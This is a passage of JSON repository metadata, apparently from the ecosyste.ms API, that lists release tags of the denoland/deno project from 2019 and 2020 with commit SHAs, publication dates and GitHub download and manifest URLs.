ublished_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.52.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.52.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.52.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0/manifests"},{"name":"std/0.51.0","sha":"c474d383543708fc636c06dd2e4a9100495f45c5","kind":"commit","published_at":"2020-05-14T11:45:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.51.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.51.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.51.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0/manifests"},{"name":"v1.0.0","sha":"55d2c6bd103879263c115fa5697f3cf3101158f4","kind":"commit","published_at":"2020-05-13T22:07:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc3","sha":"35e8bc8de65b523e082d446dc25f114ed81264a8","kind":"commit","published_at":"2020-05-12T12:33:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc2","sha":"d8f5b37218715bbc624eb53dd4b7409867b2c803","kind":"commit","published_at":"2020-05-09T19:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2/manifests"},{"name":"std/0.50.0","sha":"d5dd5ae87d7598643a46f27fa4a11b2a85d42be8","kind":"commit","published_at":"2020-05-09T13:15:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.50.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.50.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.50.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0/manifests"},{"name":"v1.0.0-rc1","sha":"5f67a202ff59f25ea183c261f664a6db06407e17","kind":"commit","published_at":"2020-05-04T19:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1/manifests"},{"name":"v0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0/manifests"},{"name":"std/0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0/manifests"},{"name":"v0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0/manifests"},{"name":"std/0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0/manifests"},{"name":"v0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0/manifests"},{"name":"std/0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0/manifests"},{"name":"v0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0/manifests"},{"name":"std/0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0/manifests"},{"name":"v0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0/manifests"},{"name":"std/0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0/manifests"},{"name":"v0.37.1","sha":"b924e5ab7e69eab4d3b6d9a863a8fc2974f33b5d","kind":"commit","published_at":"2020-03-23T21:14:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1/manifests"},{"name":"v0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0/manifests"},{"name":"std/0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0/manifests"},{"name":"v0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0/manifests"},{"name":"std/0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0/manifests"},{"name":"v0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0/manifests"},{"name":"std/0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0/manifests"},{"name":"v0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0/manifests"},{"name":"std/0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0/manifests"},{"name":"v0.33.0","sha":"87c329c45ac0e3382c115793094317df15cbe5bf","kind":"commit","published_at":"2020-02-13T22:45:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0/manifests"},{"name":"v0.32.0","sha":"f4cc08c4fc97f86d82b860ac11a134dad75dfdca","kind":"commit","published_at":"2020-02-03T15:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0/manifests"},{"name":"v0.31.0","sha":"8bc639a23e141d350e35ea112a4a9be2ea536fe6","kind":"commit","published_at":"2020-01-24T16:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0/manifests"},{"name":"v0.30.1","sha":"7fd50065a7d8a4c6ed1b1090703a7baaabdbd6aa","kind":"commit","published_at":"2020-01-21T17:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1/manifests"},{"name":"v0.30.0","sha":"b2f01dcb50c68da2cab28b6bd64f4033e4ccf10e","kind":"commit","published_at":"2020-01-18T12:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0/manifests"},{"name":"v0.29.0","sha":"525784e5642cbd869c682a0fda595f55c785d607","kind":"commit","published_at":"2020-01-09T18:42:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0/manifests"},{"name":"v0.28.1","sha":"a61966a243cd5d09031fabd9a572a75aab8d2da8","kind":"commit","published_at":"2020-01-03T14:04:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1/manifests"},{"name":"v0.28.0","sha":"328fef9cd6aa0ab3033380cabdf91b9779db5054","kind":"commit","published_at":"2020-01-02T13:41:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0/manifests"},{"name":"v0.27.0","sha":"fcae4a7c0dc74701f3b1919bfd76cfdc1a0321ed","kind":"commit","published_at":"2019-12-18T23:48:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0/manifests"},{"name":"v0.26.0","sha":"0ce9011edc8ec53df47e3103ecca3069d385ce37","kind":"commit","published_at":"2019-12-06T02:41:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0/manifests"},{"name":"v0.25.0","sha":"2cd22b5437a375f0e33f26327101afb818a03802","kind":"commit","published_at":"2019-11-26T18:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0/manifests"},{"name":"v0.24.0","sha":"0fffef8e5afed754358efc5b41d93549592cd941","kind":"commit","published_at":"2019-11-15T03:52:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0/manifests"},{"name":"v0.23.0","sha":"a611788834e40153ef27c8f1d6b7fd52c8a016b1","kind":"tag","published_at":"2019-11-05T02:50:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0/manifests"},{"name":"v0.22.0","sha":"71efe6f2c530d1cb9e8a2679f5778e2c034a9d0d","kind":"commit","published_at":"2019-10-28T18:12:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0/manifests"},{"name":"v0.21.0","sha":"4e88ba9a114279b3969d5ccca1cca0f74c8fc1fd","kind":"commit","published_at":"2019-10-19T22:46:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0/manifests"},{"name":"v0.20.0","sha":"a4b27db21a10f9913460c054c98fce59f3dd157d","kind":"commit","published_at":"2019-10-07T16:57:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0/manifests"},{"name":"v0.19.0","sha":"3892cf59018acd71dd4bc1099d747bd683cd4118","kind":"commit","published_at":"2019-09-25T14:58:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0/manifests"},{"name":"v0.18.0","sha":"7e3296dad92cee2e8b77baedfbeca38aa297928e","kind":"commit","published_at":"2019-09-13T20:40:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0/manifests"},{"name":"v0.17.0","sha":"82588ec09c199683cff88097e1b90649497239c7","kind":"commit","published_at":"2019-09-04T21:15:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0/manifests"},{"name":"v0.16.0","sha":"0809b06a3938868f364f1343b0de4d5d9686495d","kind":"tag","published_at":"2019-08-22T22:12:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0/manifests"},{"name":"v0.15.0","sha":"58f0e9b9b1b53ca486ef38ae662b98cbde839248","kind":"commit","published_at":"2019-08-13T22:35:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0/manifests"},{"name":"v0.14.0","sha":"83d5362f1d7d8589b862de57912135067a8278c7","kind":"tag","published_at":"2019-08-09T01:48:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno